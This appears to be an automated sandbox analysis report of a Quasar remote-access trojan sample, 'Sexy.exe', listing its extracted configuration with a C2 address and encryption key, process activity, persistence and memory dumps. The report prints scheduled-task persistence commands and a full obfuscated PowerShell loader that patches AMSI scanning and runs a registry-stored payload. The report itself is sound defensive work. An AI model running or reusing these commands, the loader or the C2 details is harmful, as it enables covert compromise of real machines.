Analysis
-
max time kernel
38s -
max time network
31s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-04-2024 17:11
Behavioral task
behavioral1
Sample
Sexy.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Sexy.exe
Resource
win10v2004-20240412-en
Errors
General
-
Target
Sexy.exe
-
Size
409KB
-
MD5
4c5faec89139e079202a5208d49ed5a0
-
SHA1
f26bf551e191af0dd01b5d39ae0c8489d94a877e
-
SHA256
bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378
-
SHA512
5d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64
-
SSDEEP
12288:iBwz9kOUJIOSQoxdKIT00N2f3DPcCYDVouW5:i+JLOsVRi3YCYg
Malware Config
Extracted
quasar
3.1.5
SLAVE
147.185.221.19:33587
$Sxr-zpFqsQjJJh3miBvVnu
-
encryption_key
LxGS9iJRjIMm1rV0MEzT
-
install_name
BiosUpdX64YDPS.exe
-
log_directory
$sxr
-
reconnect_delay
3000
-
startup_key
$sxr-mtsha
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral3/memory/4132-0-0x0000000000660000-0x00000000006CC000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2536 created 632 2536 powershell.EXE winlogon.exe -
Executes dropped EXE 2 IoCs
Processes:
BiosUpdX64YDPS.exeInstall.exepid process 2440 BiosUpdX64YDPS.exe 5068 Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 2 IoCs
Processes:
powershell.EXEdescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 2536 set thread context of 1536 2536 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 2328 schtasks.exe 3588 SCHTASKS.exe 2764 schtasks.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
powershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
powershell.EXEdllhost.exepid process 2536 powershell.EXE 2536 powershell.EXE 2536 powershell.EXE 1536 dllhost.exe 1536 dllhost.exe 1536 dllhost.exe 1536 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
Sexy.exeBiosUpdX64YDPS.exepowershell.EXEdllhost.exedescription pid process Token: SeDebugPrivilege 4132 Sexy.exe Token: SeDebugPrivilege 2440 BiosUpdX64YDPS.exe Token: SeDebugPrivilege 2536 powershell.EXE Token: SeDebugPrivilege 2536 powershell.EXE Token: SeDebugPrivilege 1536 dllhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
BiosUpdX64YDPS.exepid process 2440 BiosUpdX64YDPS.exe -
Suspicious use of WriteProcessMemory 30 IoCs
Processes:
Sexy.exeBiosUpdX64YDPS.exepowershell.EXEdllhost.exedescription pid process target process PID 4132 wrote to memory of 2328 4132 Sexy.exe schtasks.exe PID 4132 wrote to memory of 2328 4132 Sexy.exe schtasks.exe PID 4132 wrote to memory of 2328 4132 Sexy.exe schtasks.exe PID 4132 wrote to memory of 2440 4132 Sexy.exe BiosUpdX64YDPS.exe PID 4132 wrote to memory of 2440 4132 Sexy.exe BiosUpdX64YDPS.exe PID 4132 wrote to memory of 2440 4132 Sexy.exe BiosUpdX64YDPS.exe PID 4132 wrote to memory of 5068 4132 Sexy.exe Install.exe PID 4132 wrote to memory of 5068 4132 Sexy.exe Install.exe PID 4132 wrote to memory of 5068 4132 Sexy.exe Install.exe PID 4132 wrote to memory of 3588 4132 Sexy.exe SCHTASKS.exe PID 4132 wrote to memory of 3588 4132 Sexy.exe SCHTASKS.exe PID 4132 wrote to memory of 3588 4132 Sexy.exe SCHTASKS.exe PID 2440 wrote to memory of 2764 2440 BiosUpdX64YDPS.exe schtasks.exe PID 2440 wrote to memory of 2764 2440 BiosUpdX64YDPS.exe schtasks.exe PID 2440 wrote to memory of 2764 2440 BiosUpdX64YDPS.exe schtasks.exe PID 2536 wrote to memory of 1536 2536 powershell.EXE dllhost.exe PID 2536 wrote to memory of 1536 2536 powershell.EXE dllhost.exe PID 2536 wrote to memory of 1536 2536 powershell.EXE dllhost.exe PID 2536 wrote to memory of 1536 2536 powershell.EXE dllhost.exe PID 2536 wrote to memory of 1536 2536 powershell.EXE dllhost.exe PID 2536 wrote to memory of 1536 2536 powershell.EXE dllhost.exe PID 2536 wrote to memory of 1536 2536 powershell.EXE dllhost.exe PID 2536 wrote to memory of 1536 2536 powershell.EXE dllhost.exe PID 1536 wrote to memory of 632 1536 dllhost.exe winlogon.exe PID 1536 wrote to memory of 688 1536 dllhost.exe lsass.exe PID 1536 wrote to memory of 976 1536 dllhost.exe svchost.exe PID 1536 wrote to memory of 400 1536 dllhost.exe dwm.exe PID 1536 wrote to memory of 760 1536 dllhost.exe svchost.exe PID 1536 wrote to memory of 712 1536 dllhost.exe svchost.exe PID 1536 wrote to memory of 1092 1536 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{99a32fbc-e01e-4420-bb9d-dfa34b586f7b}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Users\Admin\AppData\Local\Temp\Sexy.exe"C:\Users\Admin\AppData\Local\Temp\Sexy.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Sexy.exe" /rl HIGHEST /f2⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$sxr-mtsha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Sexy.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Sexy.exe'" /sc onlogon /rl HIGHEST2⤵
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XmCctSJegdhO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EhNPCrnudphSsA,[Parameter(Position=1)][Type]$LPSLIHayUN)$dZNvSOBwUth=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+'oryM'+'o'+''+'d'+''+'u'+'l'+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+'t'+'e'+''+'T'+'y'+'p'+'e',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+'S'+'e'+''+[Char](97)+'l'+'e'+''+'d'+''+[Char](44)+''+[Char](65)+'ns'+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$dZNvSOBwUth.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+'c'+'i'+[Char](97)+'lNa'+[Char](109)+''+'e'+''+','+''+'H'+''+[Char](105)+'d'+[Char](101)+'By'+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$EhNPCrnudphSsA).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+'ged');$dZNvSOBwUth.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'o'+[Char](107)+''+'e'+'',''+'P'+'ub'+'l'+''+'i'+'c'+','+''+[Char](72)+''+[Char](105)+''+'d'+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+'o'+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l',$LPSLIHayUN,$EhNPCrnudphSsA).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+''+[Char](77)+'a'+[Char](110)+''+'a'+'g'+[Char](101)+'d');Write-Output $dZNvSOBwUth.CreateType();}$KtHxvwIJGfEFm=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'ys'+[Char](116)+'e'+'m'+'.'+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+'cr'+[Char](111)+'s'+[Char](111)+'ft.'+[Char](87)+''+[Char](105)+''+'n'+''+'3'+''+'2'+''+'.'+''+[Char](85)+'n'+[Char](115)+'a'+[Char](102)+''+'e'+'Na'+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+'e'+'t'+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$eAeHhUJdIqWIvi=$KtHxvwIJGfEFm.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+''+'r'+'o'+'c'+''+'A'+''+'d'+'dre'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+'li'+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZAoEIvKuzSeYwNuVJki=XmCctSJegdhO @([String])([IntPtr]);$cCycpjeXgeZmTCvWuhEaGC=XmCctSJegdhO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$yWRxnowJPUF=$KtHxvwIJGfEFm.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+'e'+[Char](108)+'3'+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$EuImrAhUIHacaq=$eAeHhUJdIqWIvi.Invoke($Null,@([Object]$yWRxnowJPUF,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+[Char](105)+''+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$IcivmBEpaDIMpTZVu=$eAeHhUJdIqWIvi.Invoke($Null,@([Object]$yWRxnowJPUF,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+''+'P'+''+'r'+''+[Char](111)+''+'t'+''+'e'+'c'+[Char](116)+'')));$DQElFuR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EuImrAhUIHacaq,$ZAoEIvKuzSeYwNuVJki).Invoke('am'+[Char](115)+'i.'+[Char](100)+''+[Char](108)+''+'l'+'');$wGYqPzTTGsjpJICYP=$eAeHhUJdIqWIvi.Invoke($Null,@([Object]$DQElFuR,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+'f'+'er')));$tmgrgxibyo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IcivmBEpaDIMpTZVu,$cCycpjeXgeZmTCvWuhEaGC).Invoke($wGYqPzTTGsjpJICYP,[uint32]8,4,[ref]$tmgrgxibyo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wGYqPzTTGsjpJICYP,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IcivmBEpaDIMpTZVu,$cCycpjeXgeZmTCvWuhEaGC).Invoke($wGYqPzTTGsjpJICYP,[uint32]8,0x20,[ref]$tmgrgxibyo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+[Char](70)+''+'T'+'W'+[Char](65)+''+[Char](82)+'E').GetValue('$'+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+'a'+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Windows\BiosUpdX64YDPS.exeFilesize
409KB
MD54c5faec89139e079202a5208d49ed5a0
SHA1f26bf551e191af0dd01b5d39ae0c8489d94a877e
SHA256bbecd1e502693965f493ecb6a611dd86dc71b4bcb8471cf4c459d0b44e9f6378
SHA5125d31a95a76a2d17967f685b47823682f8301164ee9386f267f2ce28b866429dfb48aa7ef7cb21a7ab8b732286fb99eee989d10e5040ea69a361ba83b0b22ec64
-
C:\Windows\Temp\__PSScriptPolicyTest_zbf5n4st.i2l.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/400-81-0x000001795EAA0000-0x000001795EACB000-memory.dmpFilesize
172KB
-
memory/632-56-0x0000023B14480000-0x0000023B144AB000-memory.dmpFilesize
172KB
-
memory/632-79-0x00007FFF09184000-0x00007FFF09185000-memory.dmpFilesize
4KB
-
memory/632-54-0x0000023B14450000-0x0000023B14475000-memory.dmpFilesize
148KB
-
memory/632-55-0x0000023B14480000-0x0000023B144AB000-memory.dmpFilesize
172KB
-
memory/632-73-0x0000023B14480000-0x0000023B144AB000-memory.dmpFilesize
172KB
-
memory/632-78-0x00007FFEC9170000-0x00007FFEC9180000-memory.dmpFilesize
64KB
-
memory/688-69-0x000001BDFEFB0000-0x000001BDFEFDB000-memory.dmpFilesize
172KB
-
memory/760-95-0x000001BA9CEA0000-0x000001BA9CECB000-memory.dmpFilesize
172KB
-
memory/976-80-0x000001972BC90000-0x000001972BCBB000-memory.dmpFilesize
172KB
-
memory/1536-38-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-49-0x00007FFF090E0000-0x00007FFF092E9000-memory.dmpFilesize
2.0MB
-
memory/1536-44-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-50-0x00007FFF07B00000-0x00007FFF07BBD000-memory.dmpFilesize
756KB
-
memory/1536-89-0x00007FFF090E0000-0x00007FFF092E9000-memory.dmpFilesize
2.0MB
-
memory/1536-40-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-42-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-39-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/1536-51-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/2440-14-0x0000000004E70000-0x0000000004E80000-memory.dmpFilesize
64KB
-
memory/2440-58-0x0000000074DE0000-0x0000000075591000-memory.dmpFilesize
7.7MB
-
memory/2440-24-0x0000000006600000-0x000000000660A000-memory.dmpFilesize
40KB
-
memory/2440-13-0x0000000074DE0000-0x0000000075591000-memory.dmpFilesize
7.7MB
-
memory/2536-61-0x00007FFEE8290000-0x00007FFEE8D52000-memory.dmpFilesize
10.8MB
-
memory/2536-22-0x000001577E3D0000-0x000001577E3E0000-memory.dmpFilesize
64KB
-
memory/2536-21-0x00007FFEE8290000-0x00007FFEE8D52000-memory.dmpFilesize
10.8MB
-
memory/2536-45-0x00007FFF07B00000-0x00007FFF07BBD000-memory.dmpFilesize
756KB
-
memory/2536-37-0x00007FFF07B00000-0x00007FFF07BBD000-memory.dmpFilesize
756KB
-
memory/2536-36-0x00007FFF090E0000-0x00007FFF092E9000-memory.dmpFilesize
2.0MB
-
memory/2536-35-0x000001577E340000-0x000001577E36A000-memory.dmpFilesize
168KB
-
memory/2536-33-0x0000015765D50000-0x0000015765D72000-memory.dmpFilesize
136KB
-
memory/2536-34-0x000001577E3D0000-0x000001577E3E0000-memory.dmpFilesize
64KB
-
memory/2536-62-0x00007FFF090E0000-0x00007FFF092E9000-memory.dmpFilesize
2.0MB
-
memory/4132-5-0x0000000005180000-0x00000000051E6000-memory.dmpFilesize
408KB
-
memory/4132-1-0x0000000074DE0000-0x0000000075591000-memory.dmpFilesize
7.7MB
-
memory/4132-2-0x0000000005800000-0x0000000005DA6000-memory.dmpFilesize
5.6MB
-
memory/4132-7-0x00000000064E0000-0x000000000651C000-memory.dmpFilesize
240KB
-
memory/4132-3-0x0000000005250000-0x00000000052E2000-memory.dmpFilesize
584KB
-
memory/4132-20-0x0000000074DE0000-0x0000000075591000-memory.dmpFilesize
7.7MB
-
memory/4132-0-0x0000000000660000-0x00000000006CC000-memory.dmpFilesize
432KB
-
memory/4132-4-0x0000000005410000-0x0000000005420000-memory.dmpFilesize
64KB
-
memory/4132-6-0x0000000005FB0000-0x0000000005FC2000-memory.dmpFilesize
72KB